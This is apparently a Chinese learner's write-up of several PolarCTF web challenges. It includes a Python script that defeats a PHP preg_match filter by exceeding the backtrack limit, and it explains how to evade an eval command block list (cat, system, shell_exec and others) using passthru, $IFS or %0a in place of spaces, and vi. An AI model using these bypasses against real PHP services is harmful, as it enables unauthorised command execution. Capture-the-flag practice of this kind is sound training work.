静以养心,宽以养气。
跟着Dream ZHO大神学专升安的一天
swp
直接dirb扫出.index.php.swp的目录
function jiuzhe($xdmtql){
return preg_match('/sys.*nb/is',$xdmtql);//如果包含以 "sys" 开始,后跟任意字符直到 "nb" 的字符串,返回true
}
$xdmtql=@$_POST['xdmtql'];
if(!is_array($xdmtql)){//非数组
if(!jiuzhe($xdmtql)){
if(strpos($xdmtql,'sys nb')!==false){如果$xdmtql匹配到sys nb则输出flag{*******}
echo 'flag{*******}';
}else{
echo 'true .swp file?';
}
}else{
echo 'nijilenijile';
}
}
我们要想得到flag要满足:$xdmtql非数组,不匹配/sys.*nb/is,但是要匹配strpos($xdmtql,'sys nb')为true
这样我们可以用回溯绕过,pre_match函数处理的字符长度有限,如果超过这个长度就会返回false也就是没有匹配到。直接上脚本。
import requests
request=requests.post('http://24aac5d4-fc13-414a-8c21-62130c090777.www.polarctf.com:8090/',data={'xdmtql':'sys nb'+'-'*1000000})
print(request.text)
简单rce
<?php
/*
PolarD&N CTF
*/
highlight_file(__FILE__);
function no($txt){
if(!preg_match("/cat|more|less|head|tac|tail|nl|od|vim|uniq|system|proc_open|shell_exec|popen| /i", $txt)){
return $txt;}
else{
die("what's up");}}
$yyds=($_POST['yyds']);
if(isset($_GET['sys'])&&$yyds=='666'){
eval(no($_GET['sys']));
}
else
{echo "nonono";
}
?> nonono
这题过滤了cat|more|less|head|tac|tail|nl|od|vim|uniq|system|proc_open|shell_exec|popen这么多函数,但是他过滤,关我什么事,我们仍可以用echo和passthru来查看目录,空格用%0a或{$IFS}代替,读取文件用vi。
下面直接开打!!!
蜜雪冰城吉警店
只要把任意id改为9即可
召唤神龙
直接看源码,发现js有jsfuck编码
在浏览器解密一下就出来了
seek flag
查看源码一眼robots.txt
发现了flag3,那我们再找另两部分
抓个包看看
发现flag2,将id设为1发现flag1